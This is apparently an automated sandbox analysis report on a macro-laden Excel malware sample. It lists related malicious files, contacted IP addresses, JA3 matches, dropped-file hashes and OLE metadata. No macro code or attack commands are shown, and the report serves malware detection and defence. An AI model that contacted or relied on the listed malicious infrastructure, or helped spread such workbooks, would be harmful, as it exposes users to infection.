                                                                          090811fa_by_Libranalysis.xlsGet hashmaliciousBrowse
                                                                          • 192.185.32.232
                                                                          54402971_by_Libranalysis.xlsGet hashmaliciousBrowse
                                                                          • 192.185.32.232
                                                                          54402971_by_Libranalysis.xlsGet hashmaliciousBrowse
                                                                          • 192.185.32.232
                                                                          afdab907_by_Libranalysis.xlsGet hashmaliciousBrowse
                                                                          • 192.185.32.232
                                                                          afdab907_by_Libranalysis.xlsGet hashmaliciousBrowse
                                                                          • 192.185.32.232
                                                                          70654 SSEBACIC EGYPT.exeGet hashmaliciousBrowse
                                                                          • 192.254.185.244
                                                                          8100c344_by_Libranalysis.xlsGet hashmaliciousBrowse
                                                                          • 192.185.32.232
                                                                          8100c344_by_Libranalysis.xlsGet hashmaliciousBrowse
                                                                          • 192.185.32.232
                                                                          32154f4c_by_Libranalysis.xlsGet hashmaliciousBrowse
                                                                          • 192.185.32.232
                                                                          32154f4c_by_Libranalysis.xlsGet hashmaliciousBrowse
                                                                          • 192.185.32.232
                                                                          9659e9a8_by_Libranalysis.xlsGet hashmaliciousBrowse
                                                                          • 192.185.32.232
                                                                          46747509_by_Libranalysis.xlsGet hashmaliciousBrowse
                                                                          • 192.185.32.232
                                                                          46747509_by_Libranalysis.xlsGet hashmaliciousBrowse
                                                                          • 192.185.32.232

                                                                          JA3 Fingerprints

                                                                          MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                          7dcce5b76c8b17472d024758970a406b0b31c0f0_by_Libranalysis.xlsGet hashmaliciousBrowse
                                                                          • 192.185.32.232
                                                                          • 192.185.39.58
                                                                          Product specification.xlsxGet hashmaliciousBrowse
                                                                          • 192.185.32.232
                                                                          • 192.185.39.58
                                                                          statistic-482095214.xlsGet hashmaliciousBrowse
                                                                          • 192.185.32.232
                                                                          • 192.185.39.58
                                                                          090811fa_by_Libranalysis.xlsGet hashmaliciousBrowse
                                                                          • 192.185.32.232
                                                                          • 192.185.39.58
                                                                          54402971_by_Libranalysis.xlsGet hashmaliciousBrowse
                                                                          • 192.185.32.232
                                                                          • 192.185.39.58
                                                                          afdab907_by_Libranalysis.xlsGet hashmaliciousBrowse
                                                                          • 192.185.32.232
                                                                          • 192.185.39.58
                                                                          7bYDInO.rtfGet hashmaliciousBrowse
                                                                          • 192.185.32.232
                                                                          • 192.185.39.58
                                                                          8100c344_by_Libranalysis.xlsGet hashmaliciousBrowse
                                                                          • 192.185.32.232
                                                                          • 192.185.39.58
                                                                          32154f4c_by_Libranalysis.xlsGet hashmaliciousBrowse
                                                                          • 192.185.32.232
                                                                          • 192.185.39.58
                                                                          46747509_by_Libranalysis.xlsGet hashmaliciousBrowse
                                                                          • 192.185.32.232
                                                                          • 192.185.39.58
                                                                          catalog-1908475637.xlsGet hashmaliciousBrowse
                                                                          • 192.185.32.232
                                                                          • 192.185.39.58
                                                                          DHL AWB.xlsxGet hashmaliciousBrowse
                                                                          • 192.185.32.232
                                                                          • 192.185.39.58
                                                                          export of purchase order 7484876.xlsmGet hashmaliciousBrowse
                                                                          • 192.185.32.232
                                                                          • 192.185.39.58
                                                                          XM7eDjwHqp.xlsmGet hashmaliciousBrowse
                                                                          • 192.185.32.232
                                                                          • 192.185.39.58
                                                                          QTFsui5pLN.xlsmGet hashmaliciousBrowse
                                                                          • 192.185.32.232
                                                                          • 192.185.39.58
                                                                          15j1TCnOiA.xlsmGet hashmaliciousBrowse
                                                                          • 192.185.32.232
                                                                          • 192.185.39.58
                                                                          e8eRhf3GM0.xlsmGet hashmaliciousBrowse
                                                                          • 192.185.32.232
                                                                          • 192.185.39.58
                                                                          Purchase Agreement.docxGet hashmaliciousBrowse
                                                                          • 192.185.32.232
                                                                          • 192.185.39.58
                                                                          551f47ac_by_Libranalysis.xlsmGet hashmaliciousBrowse
                                                                          • 192.185.32.232
                                                                          • 192.185.39.58
                                                                          export of document 555091.xlsmGet hashmaliciousBrowse
                                                                          • 192.185.32.232
                                                                          • 192.185.39.58

                                                                          Dropped Files

                                                                          No context

                                                                          Created / dropped Files

                                                                          C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\77EC63BDA74BD0D0E0426DC8F8008506
                                                                          Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                          File Type:Microsoft Cabinet archive data, 59863 bytes, 1 file
                                                                          Category:dropped
                                                                          Size (bytes):59863
                                                                          Entropy (8bit):7.99556910241083
                                                                          Encrypted:true
                                                                          SSDEEP:1536:Gs6cdy9E/ABKQPOrdweEz480zdPMHXNY/gLHfIZN:GNOqOrdDdJPAX1LHA/
                                                                          MD5:15775D95513782F99CDFB17E65DFCEB1
                                                                          SHA1:6C11F8BEE799B093F9FF4841E31041B081B23388
                                                                          SHA-256:477A9559194EDF48848FCE59E05105168745A46BDC0871EA742A2588CA9FBE00
                                                                          SHA-512:AC09CE01122D7A837BD70277BADD58FF71D8C5335F8FC599D5E3ED42C8FEE2108DD043BCE562C82BA12A81B9B08BD24B961C0961BF8FD3A0B8341C87483CD1E7
                                                                          Malicious:false
                                                                          Reputation:moderate, very likely benign file
                                                                          Preview: MSCF............,...................I........b.........R.i .authroot.stl.qqp.4..CK..8T....c_.d....A.F....m"...AH)-.%.QIR..$t)Kd.-QQ*..~.L.2.L........sx.}...~....$....yy.A.8;....|.%OV.a0xN....9..C..t.z.,X...,..1Qj,.p.E.y..ac`.<.e.c.aZW..B.jy....^]..+)..!...r.X:.O.. ..Y..j.^.8C........n7R....p!|_.+..<...A.Wt.=. .sV..`.9O...CD./.s.\#.t#..s..Jeiu..B$.....8..(g..tJ....=,...r.d.].xqX4.......g.lF...Mn.y".W.R....K\..P.n._..7...........@pm.. Q....(#.....=.)...1..kC.`......AP8.A..<....7S.L....S...^.R.).hqS...DK.6.j....u_.0.(4g.....!,.L`......h:.a]?......J9.\..Ww........%........4E.......q.QA.0.M<.&.^*aD.....,..]*....5.....\../ d.F>.V........_.J....."....wI..'..z...j..Ds....Z...[..........N<.d.?<....b..,...n......;....YK.X..0..Z.....?...9.3.+9T.%.l...5.YK.E.V...aD.0...Y../e.7...c..g....A..=.....+..u2..X.~....O....\=...&...U.e...?...z....$.)S..T...r.!?M..;.....r,QH.B <.(t..8s3..u[.N8gL.%...v....f...W.y...cz-.EQ.....c...o..n........D*..........2.
                                                                          C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\E0F5C59F9FA661F6F4C50B87FEF3A15A
                                                                          Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                          File Type:data
                                                                          Category:dropped
                                                                          Size (bytes):893
                                                                          Entropy (8bit):7.366016576663508
                                                                          Encrypted:false
                                                                          SSDEEP:24:hBntmDvKUQQDvKUr7C5fpqp8gPvXHmXvponXux:3ntmD5QQD5XC5RqHHXmXvp++x
                                                                          MD5:D4AE187B4574036C2D76B6DF8A8C1A30
                                                                          SHA1:B06F409FA14BAB33CBAF4A37811B8740B624D9E5
                                                                          SHA-256:A2CE3A0FA7D2A833D1801E01EC48E35B70D84F3467CC9F8FAB370386E13879C7
                                                                          SHA-512:1F44A360E8BB8ADA22BC5BFE001F1BABB4E72005A46BC2A94C33C4BD149FF256CCE6F35D65CA4F7FC2A5B9E15494155449830D2809C8CF218D0B9196EC646B0C
                                                                          Malicious:false
                                                                          Reputation:high, very likely benign file
                                                                          Preview: 0..y..*.H.........j0..f...1.0...*.H.........N0..J0..2.......D....'..09...@k0...*.H........0?1$0"..U....Digital Signature Trust Co.1.0...U....DST Root CA X30...000930211219Z..210930140115Z0?1$0"..U....Digital Signature Trust Co.1.0...U....DST Root CA X30.."0...*.H.............0..........P..W..be......,k0.[...}.@......3vI*.?!I..N..>H.e...!.e.*.2....w..{........s.z..2..~..0....*8.y.1.P..e.Qc...a.Ka..Rk...K.(.H......>.... .[.*....p....%.tr.{j.4.0...h.{T....Z...=d.....Ap..r.&.8U9C....\@........%.......:..n.>..\..<.i....*.)W..=....]......B0@0...U.......0....0...U...........0...U.........{,q...K.u...`...0...*.H...............,...\...(f7:...?K.... ]..YD.>.>..K.t.....t..~.....K. D....}..j.....N..:.pI...........:^H...X._..Z.....Y..n......f3.Y[...sG.+..7H..VK....r2...D.SrmC.&H.Rg.X..gvqx...V..9$1....Z0G..P.......dc`........}...=2.e..|.Wv..(9..e...w.j..w.......)...55.1.
                                                                          C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\77EC63BDA74BD0D0E0426DC8F8008506
                                                                          Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                          File Type:data
                                                                          Category:dropped
                                                                          Size (bytes):326
                                                                          Entropy (8bit):3.1320855555941924
                                                                          Encrypted:false
                                                                          SSDEEP:6:kKBNKpkQSN+SkQlPlEGYRMY9z+4KlDA3RUeSKyzkOt:J8phZkPlE99SNxAhUeSKO
                                                                          MD5:FF7BEBF8C83D37599A856D9611C79A64
                                                                          SHA1:FDBB871E9994FD87766EE1BD3AE540ECEF695FC6
                                                                          SHA-256:75BF943337E820558AC3870FE9C57DB0EADA4FBB746F687629D01BC1D72B2181
                                                                          SHA-512:CB3C2AE8048718A7E82AA247E83A815A8C76A783ED2BFDF652E511217A5CB2C2D67901E3F9677C486ACDEED7992B2D75C41BEBB1A7605B2ED15E45C2396AC7E0
                                                                          Malicious:false
                                                                          Reputation:low
                                                                          Preview: p...... ........z\.c.G..(....................................................... ...........Y5......$...............h.t.t.p.:././.c.t.l.d.l...w.i.n.d.o.w.s.u.p.d.a.t.e...c.o.m./.m.s.d.o.w.n.l.o.a.d./.u.p.d.a.t.e./.v.3./.s.t.a.t.i.c./.t.r.u.s.t.e.d.r./.e.n./.a.u.t.h.r.o.o.t.s.t.l...c.a.b...".8.0.f.8.8.3.5.9.3.5.d.7.1.:.0."...
                                                                          C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\E0F5C59F9FA661F6F4C50B87FEF3A15A
                                                                          Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                          File Type:data
                                                                          Category:dropped
                                                                          Size (bytes):252
                                                                          Entropy (8bit):2.9853979364525842
                                                                          Encrypted:false
                                                                          SSDEEP:3:kkFklSHIKlXfllXlE/jQEBllPlzRkwWBARLNDU+ZMlKlBkvclcMlVHblB1Ffl5n0:kKLIbQE1liBAIdQZV7ulPPN
                                                                          MD5:121F69A3EDA3EC35E85D769BDBA411B0
                                                                          SHA1:FA29D86ED806FF85EDB6450693EA14834F787416
                                                                          SHA-256:625543A26F5EC1C2C283B9D14CEB88A149C0E1E7AB8DF5D463C4CBF07C5F47F3
                                                                          SHA-512:3A5E1AE302B59C4120442B1A48DDEAC6C12D62A880250945DE9E4975246423537728890BC8A910932F378EC70F55521827862C4EF6647C132AE62029CA36EEDE
                                                                          Malicious:false
                                                                          Reputation:low
                                                                          Preview: p...... ....`....x.b.G..(....................................................... .........|.j-......(...........}...h.t.t.p.:././.a.p.p.s...i.d.e.n.t.r.u.s.t...c.o.m./.r.o.o.t.s./.d.s.t.r.o.o.t.c.a.x.3...p.7.c...".3.7.d.-.5.b.f.8.d.f.8.0.6.2.7.0.0."...
                                                                          C:\Users\user\AppData\Local\Temp\9CDE0000
                                                                          Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                          File Type:data
                                                                          Category:dropped
                                                                          Size (bytes):81245
                                                                          Entropy (8bit):7.906572817548327
                                                                          Encrypted:false
                                                                          SSDEEP:1536:TeKmfTW8SDcn9iZtJOXAQR2KtCbuMB/yDL4D5Kzhl4AiCb/1R:TALW8SD8YZo/Uh0GUzEiX
                                                                          MD5:AF4FD9CB946BB386C0CFE74CC853B894
                                                                          SHA1:5523F28714D3B968146E491A954C6587B1501CC2
                                                                          SHA-256:378B236D974C071FB4A4A22C54D0996762C4062DA9F6FA63E9B995497076F841
                                                                          SHA-512:BC1B88C7D40E7369AFE025F4FAF5A1AE62568A5E512AA4E731F34A842671F63FE0302B8F625D1D02AB35D8382356956BB3435D579AC3EF8C3FD2BDF23EFB5F51
                                                                          Malicious:false
                                                                          Reputation:low
                                                                          Preview: .U.n.0....?..........C....I?.&..an.0........%..h!..y...5..D.......J..e....o..$...;h....,>..?m.`Eh.-.S..9G......fV>Z..5v<........+..%p.N..-.?a%.M.n74.s..U?v.e......".Q...H.W+-Ay.l....A(...5M....#.D.!.'5..4....iD..G......B.R....PX.(..s..~..F..z.1..Ki..>.....$9L.5l$..$.X!..ubi..vo..(.$.r..!..&9.~..B<...j.P._.T....^&C.... .Q..J.../......ik.GD7e..H..{.A=&j.....{....5[....s.......}@j.......2..D.1i8..S..H.q..Qg.|H(P'.y9..........PK..........!..!.9............[Content_Types].xml ...(.................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                          C:\Users\user\AppData\Local\Temp\CabE81F.tmp
                                                                          Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                          File Type:Microsoft Cabinet archive data, 59863 bytes, 1 file
                                                                          Category:dropped
                                                                          Size (bytes):59863
                                                                          Entropy (8bit):7.99556910241083
                                                                          Encrypted:true
                                                                          SSDEEP:1536:Gs6cdy9E/ABKQPOrdweEz480zdPMHXNY/gLHfIZN:GNOqOrdDdJPAX1LHA/
                                                                          MD5:15775D95513782F99CDFB17E65DFCEB1
                                                                          SHA1:6C11F8BEE799B093F9FF4841E31041B081B23388
                                                                          SHA-256:477A9559194EDF48848FCE59E05105168745A46BDC0871EA742A2588CA9FBE00
                                                                          SHA-512:AC09CE01122D7A837BD70277BADD58FF71D8C5335F8FC599D5E3ED42C8FEE2108DD043BCE562C82BA12A81B9B08BD24B961C0961BF8FD3A0B8341C87483CD1E7
                                                                          Malicious:false
                                                                          Reputation:moderate, very likely benign file
                                                                          Preview: MSCF............,...................I........b.........R.i .authroot.stl.qqp.4..CK..8T....c_.d....A.F....m"...AH)-.%.QIR..$t)Kd.-QQ*..~.L.2.L........sx.}...~....$....yy.A.8;....|.%OV.a0xN....9..C..t.z.,X...,..1Qj,.p.E.y..ac`.<.e.c.aZW..B.jy....^]..+)..!...r.X:.O.. ..Y..j.^.8C........n7R....p!|_.+..<...A.Wt.=. .sV..`.9O...CD./.s.\#.t#..s..Jeiu..B$.....8..(g..tJ....=,...r.d.].xqX4.......g.lF...Mn.y".W.R....K\..P.n._..7...........@pm.. Q....(#.....=.)...1..kC.`......AP8.A..<....7S.L....S...^.R.).hqS...DK.6.j....u_.0.(4g.....!,.L`......h:.a]?......J9.\..Ww........%........4E.......q.QA.0.M<.&.^*aD.....,..]*....5.....\../ d.F>.V........_.J....."....wI..'..z...j..Ds....Z...[..........N<.d.?<....b..,...n......;....YK.X..0..Z.....?...9.3.+9T.%.l...5.YK.E.V...aD.0...Y../e.7...c..g....A..=.....+..u2..X.~....O....\=...&...U.e...?...z....$.)S..T...r.!?M..;.....r,QH.B <.(t..8s3..u[.N8gL.%...v....f...W.y...cz-.EQ.....c...o..n........D*..........2.
                                                                          C:\Users\user\AppData\Local\Temp\TarE820.tmp
                                                                          Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                          File Type:data
                                                                          Category:dropped
                                                                          Size (bytes):156386
                                                                          Entropy (8bit):6.3086528024913715
                                                                          Encrypted:false
                                                                          SSDEEP:1536:ZlI6c79JjgCyrYBWsWimp4Ydm6Caku2SWsz0OD8reJgMnl3XlMyGr:ZBUJcCyZfdmoku2SL3kMnBGyA
                                                                          MD5:78CABD9F1AFFF17BB91A105CF4702188
                                                                          SHA1:52FA8144D1FC5F92DEB45E53F076BCC69F5D8CC7
                                                                          SHA-256:C7B6743B228E40B19443E471081A51041974801D325DB4ED8FD73A1A24CBD066
                                                                          SHA-512:F0BF5DFBAB47CC6A3D1BF03CEC3FDDA84537DB756DA97E6D93CF08A5C750EABDFBF7FCF7EBDFFF04326617E43F0D767E5A2B7B68C548C6D9C48F36493881F62B
                                                                          Malicious:false
                                                                          Reputation:moderate, very likely benign file
                                                                          Preview: 0..b...*.H.........b.0..b....1.0...`.H.e......0..R...+.....7.....R.0..R.0...+.....7........5XY._...210419201239Z0...+......0..R.0..*.....`...@.,..0..0.r1...0...+.....7..~1......D...0...+.....7..i1...0...+.....7<..0 ..+.....7...1.......@N...%.=.,..0$..+.....7...1......`@V'..%..*..S.Y.00..+.....7..b1". .].L4.>..X...E.W..'..........-@w0Z..+.....7...1L.JM.i.c.r.o.s.o.f.t. .R.o.o.t. .C.e.r.t.i.f.i.c.a.t.e. .A.u.t.h.o.r.i.t.y...0..,...........[./..uIv..%1...0...+.....7..h1.....6.M...0...+.....7..~1...........0...+.....7...1...0...+.......0 ..+.....7...1...O..V.........b0$..+.....7...1...>.)....s,.=$.~R.'..00..+.....7..b1". [x.....[....3x:_....7.2...Gy.cS.0D..+.....7...16.4V.e.r.i.S.i.g.n. .T.i.m.e. .S.t.a.m.p.i.n.g. .C.A...0......4...R....2.7.. ...1..0...+.....7..h1......o&...0...+.....7..i1...0...+.....7<..0 ..+.....7...1...lo...^....[...J@0$..+.....7...1...J\u".F....9.N...`...00..+.....7..b1". ...@.....G..d..m..$.....X...}0B..+.....7...14.2M.i.c.r.o.s.o.f.t. .R.o.o.t. .A.u.t.h.o
                                                                          C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\85095f36_by_Libranalysis.LNK
                                                                          Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                          File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Thu May 13 03:06:28 2021, mtime=Thu May 13 03:06:41 2021, atime=Thu May 13 03:06:42 2021, length=174080, window=hide
                                                                          Category:dropped
                                                                          Size (bytes):2168
                                                                          Entropy (8bit):4.55358465593507
                                                                          Encrypted:false
                                                                          SSDEEP:48:8l/XT0jSi0mOE+3MsNIOE6NQh2l/XT0jSi0mOE+3MsNIOE6NQ/:8l/Xojj0mF5sNIF6NQh2l/Xojj0mF5sq
                                                                          MD5:EC9DDED0140ED345A0E920ED384B589E
                                                                          SHA1:5D544EB2146A0F1ACF43014AC0C77A53A38C199E
                                                                          SHA-256:0C48FCC306D5B68924766143CEFFA69C49486E21C875D043AEBF23C79AB56FB5
                                                                          SHA-512:CBF696C2D8ACCAE77AF5CA8425D0CF6018EE03EEEAAB1776A171E3ABCCBA61B977AC3EE49C28723C7413161B0CAC3EBE9F06A882A5C0AC707EAB5674F40858F4
                                                                          Malicious:false
                                                                          Preview: L..................F.... ...?.bY.G..k.fa.G....a.G...............................P.O. .:i.....+00.../C:\...................t.1.....QK.X..Users.`.......:..QK.X*...................6.....U.s.e.r.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.8.1.3.....L.1......Q.y..user.8......QK.X.Q.y*...&=....U...............A.l.b.u.s.....z.1......R. ..Desktop.d......QK.X.R. *..._=..............:.....D.e.s.k.t.o.p...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.9.......2......R. .85095F~1.XLS..f......R. .R. *.........................8.5.0.9.5.f.3.6._.b.y._.L.i.b.r.a.n.a.l.y.s.i.s...x.l.s.......................-...8...[............?J......C:\Users\..#...................\\536720\Users.user\Desktop\85095f36_by_Libranalysis.xls.3.....\.....\.....\.....\.....\.D.e.s.k.t.o.p.\.8.5.0.9.5.f.3.6._.b.y._.L.i.b.r.a.n.a.l.y.s.i.s...x.l.s.........:..,.LB.)...Ag...............1SPS.XF.L8C....&.m.m............-...S.-.1.-.5.-.2.1.-.9.6.6.7.7.1.3.1.5.-.3.0.1.9.4.0.5.6.3.7.-.3.6.7.3.3.6.4.7.7.-.1.0.0.6.............`.......X.......
                                                                          C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\Desktop.LNK
                                                                          Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                          File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Read-Only, Directory, ctime=Tue Oct 17 10:04:00 2017, mtime=Thu May 13 03:06:41 2021, atime=Thu May 13 03:06:41 2021, length=8192, window=hide
                                                                          Category:dropped
                                                                          Size (bytes):867
                                                                          Entropy (8bit):4.48855128561899
                                                                          Encrypted:false
                                                                          SSDEEP:12:85QgXsLgXg/XAlCPCHaXtB8XzB/WPzX+WnicvbCLbDtZ3YilMMEpxRljKATdJP9O:851Xa/XTd6jELYeWXDv3qNrNru/
                                                                          MD5:3873FC762AD93C6502E6782085257395
                                                                          SHA1:C658594B739C74F8EEE4E83E8A5627DF2845B638
                                                                          SHA-256:741B59795C96A82A454B86B8CCDBB864EB7977C5E7B68710FCBAB4EB5F02E832
                                                                          SHA-512:AFCF1569C8B8B58619F737B8B3CD9BB870731B1C1AD6C28C8E1DC1AD7D0667A071F305D5DB683F0E299083F9FAFCA5D41F9569A63E83C157BD20DE3439E2F331
                                                                          Malicious:false
                                                                          Preview: L..................F...........7G..k.fa.G..k.fa.G... ......................i....P.O. .:i.....+00.../C:\...................t.1.....QK.X..Users.`.......:..QK.X*...................6.....U.s.e.r.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.8.1.3.....L.1......Q.y..user.8......QK.X.Q.y*...&=....U...............A.l.b.u.s.....z.1......R. ..Desktop.d......QK.X.R. *..._=..............:.....D.e.s.k.t.o.p...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.9.......i...............-...8...[............?J......C:\Users\..#...................\\536720\Users.user\Desktop.......\.....\.....\.....\.....\.D.e.s.k.t.o.p.........:..,.LB.)...Ag...............1SPS.XF.L8C....&.m.m............-...S.-.1.-.5.-.2.1.-.9.6.6.7.7.1.3.1.5.-.3.0.1.9.4.0.5.6.3.7.-.3.6.7.3.3.6.4.7.7.-.1.0.0.6.............`.......X.......536720..........D_....3N...W...9r.[.*.......}EkD_....3N...W...9r.[.*.......}Ek....
                                                                          C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\index.dat
                                                                          Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                          File Type:ASCII text, with CRLF line terminators
                                                                          Category:dropped
                                                                          Size (bytes):125
                                                                          Entropy (8bit):4.767349509094217
                                                                          Encrypted:false
                                                                          SSDEEP:3:oyBVomMFQViCGUwSLMp6luiCGUwSLMp6lmMFQViCGUwSLMp6lv:dj6FQsChNeiChNbFQsChNf
                                                                          MD5:C0B02E4E038B4F90480805B482DBDAE3
                                                                          SHA1:00B679F4AC18AFFB01A6398466F4E00C6D8B05B2
                                                                          SHA-256:8BAEB94B3746C2918D49060B37CDC1D0A232328698CC99790499356711D43CB7
                                                                          SHA-512:601165E1D352E8D280C8E50684D28EF8091CE3CBD24E4AE5407030D1C3E543FF78C30107949A40EB3179D9D7BB265CA422C307D04C4DF74AEE0F8603FEC2762D
                                                                          Malicious:false
                                                                          Preview: Desktop.LNK=0..[xls]..85095f36_by_Libranalysis.LNK=0..85095f36_by_Libranalysis.LNK=0..[xls]..85095f36_by_Libranalysis.LNK=0..
                                                                          C:\Users\user\Desktop\9DDE0000
                                                                          Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                          File Type:Applesoft BASIC program data, first line number 16
                                                                          Category:dropped
                                                                          Size (bytes):205059
                                                                          Entropy (8bit):5.64434473883402
                                                                          Encrypted:false
                                                                          SSDEEP:3072:3l8ifPSD8YNoTU90nGoPzn3brX7vrPlsrXvLJGnLrl8iNu:rfPTrTU9GuoNu
                                                                          MD5:B4F9E8030E94C8955737359892D3A4E5
                                                                          SHA1:8B2E0D0B905439A8A6F139499FBC015FB17370FE
                                                                          SHA-256:9908BE889A6E9645414AAC9E3FADEA5A26183628BECC92F35B1B7A3103E2D56A
                                                                          SHA-512:E41DF82B7F6EFBAB90BE0212173EF54E2A0F1AD1C9990E460789114396D5558FB11AA954022E21FE348F31BDBF6857E3B6022D00B93EB08F5C9DC590655EAAA4
                                                                          Malicious:false
                                                                          Preview: ........g2..........................\.p....user B.....a.........=...............................................=.....i..9J.8.......X.@...........".......................1...................C.a.l.i.b.r.i.1...................A.r.i.a.l.1...................A.r.i.a.l.1...................A.r.i.a.l.1...................C.a.l.i.b.r.i.1...,...8...........A.r.i.a.l.1.......8...........A.r.i.a.l.1.......8...........A.r.i.a.l.1.......<...........A.r.i.a.l.1.......4...........A.r.i.a.l.1.......4...........A.r.i.a.l.1...h...8...........C.a.m.b.r.i.a.1...................C.a.l.i.b.r.i.1...................A.r.i.a.l.1...................A.r.i.a.l.1.......>...........A.r.i.a.l.1.......?...........A.r.i.a.l.1...................A.r.i.a.l.1...................A.r.i.a.l.1...................C.a.l.i.b.r.i.1...................A.r.i.a.l.1...................A.r.i.a.l.1...................A.r.i.a.l.1...............

                                                                          Static File Info

                                                                          General

                                                                          File type:Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.2, Code page: 1251, Author: van-van, Last Saved By: vi-vi, Name of Creating Application: Microsoft Excel, Create Time/Date: Sat Sep 16 01:00:00 2006, Last Saved Time/Date: Wed May 12 08:24:11 2021, Security: 0
                                                                          Entropy (8bit):3.258986427712615
                                                                          TrID:
                                                                          • Microsoft Excel sheet (30009/1) 78.94%
                                                                          • Generic OLE2 / Multistream Compound File (8008/1) 21.06%
                                                                          File name:85095f36_by_Libranalysis.xls
                                                                          File size:375808
                                                                          MD5:85095f36d19d0a0cc635a9e255730ea0
                                                                          SHA1:8ec5f0d784134f08bce52949027a686cd099acd8
                                                                          SHA256:a4a5606ff24d70f51f72a501a370ab2199548d4d3a88e904cb9cfafb824d8af2
                                                                          SHA512:b95d86d75bc04d974061657cc4183c117f3a6b88ea21fb3d7e30ce1631bd8cd92928990954d9bf669d68a16b7748ca7d43246abd445fddbd29e898720c7d14d1
                                                                          SSDEEP:3072:Q8UGHv2tt/BI/s/C/i/R/7/3/UQ/OhP/2/a/1/I/T/tbHm7H9G4l+s2k3zN4sbc9:vUGAt6Uqa5DPdG9uS9QLp4l+s+I8
                                                                          File Content Preview:........................>......................................................................................................................................................................................................................................

                                                                          File Icon

                                                                          Icon Hash:e4eea286a4b4bcb4

                                                                          Static OLE Info

                                                                          General

                                                                          Document Type:OLE
                                                                          Number of OLE Files:1

                                                                          OLE File "85095f36_by_Libranalysis.xls"

                                                                          Indicators

                                                                          Has Summary Info:True
                                                                          Application Name:Microsoft Excel
                                                                          Encrypted Document:False
                                                                          Contains Word Document Stream:False
                                                                          Contains Workbook/Book Stream:True
                                                                          Contains PowerPoint Document Stream:False
                                                                          Contains Visio Document Stream:False
                                                                          Contains ObjectPool Stream:
                                                                          Flash Objects Count:
                                                                          Contains VBA Macros:True

                                                                          Summary

                                                                          Code Page:1251
                                                                          Author:van-van
                                                                          Last Saved By:vi-vi
                                                                          Create Time:2006-09-16 00:00:00
                                                                          Last Saved Time:2021-05-12 07:24:11
                                                                          Creating Application:Microsoft Excel
                                                                          Security:0

                                                                          Document Summary

                                                                          Document Code Page:1251
                                                                          Thumbnail Scaling Desired:False
                                                                          Contains Dirty Links:False

                                                                          Streams

                                                                          Stream Path: \x5DocumentSummaryInformation, File Type: data, Stream Size: 4096
                                                                          General
                                                                          Stream Path:\x5DocumentSummaryInformation
                                                                          File Type:data
                                                                          Stream Size:4096
                                                                          Entropy:0.287037498961
                                                                          Base64 Encoded:False
                                                                          Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . + , . . 0 . . . . . . . . . . . . . . . 0 . . . . . . . 8 . . . . . . . @ . . . . . . . H . . . . . . . t . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . D o c 1 . . . . . D o c 2 . . . . . D o c 3 . . . . . D o c 4 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . E x c e l 4 . 0 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                                                                          Data Raw:fe ff 00 00 06 02 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 02 d5 cd d5 9c 2e 1b 10 93 97 08 00 2b 2c f9 ae 30 00 00 00 b4 00 00 00 05 00 00 00 01 00 00 00 30 00 00 00 0b 00 00 00 38 00 00 00 10 00 00 00 40 00 00 00 0d 00 00 00 48 00 00 00 0c 00 00 00 74 00 00 00 02 00 00 00 e3 04 00 00 0b 00 00 00 00 00 00 00 0b 00 00 00 00 00 00 00 1e 10 00 00 04 00 00 00
                                                                          Stream Path: \x5SummaryInformation, File Type: data, Stream Size: 4096
                                                                          General
                                                                          Stream Path:\x5SummaryInformation
                                                                          File Type:data
                                                                          Stream Size:4096
                                                                          Entropy:0.290777742057
                                                                          Base64 Encoded:False
                                                                          Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . O h . . . . . + ' . . 0 . . . . . . . . . . . . . . . @ . . . . . . . H . . . . . . . X . . . . . . . h . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . v a n - v a n . . . . . . . . . v i - v i . . . . . . . . . . . M i c r o s o f t E x c e l . @ . . . . . | . # . . . @ . . . . . . . . F . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                                                                          Data Raw:fe ff 00 00 06 02 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 e0 85 9f f2 f9 4f 68 10 ab 91 08 00 2b 27 b3 d9 30 00 00 00 a0 00 00 00 07 00 00 00 01 00 00 00 40 00 00 00 04 00 00 00 48 00 00 00 08 00 00 00 58 00 00 00 12 00 00 00 68 00 00 00 0c 00 00 00 80 00 00 00 0d 00 00 00 8c 00 00 00 13 00 00 00 98 00 00 00 02 00 00 00 e3 04 00 00 1e 00 00 00 08 00 00 00
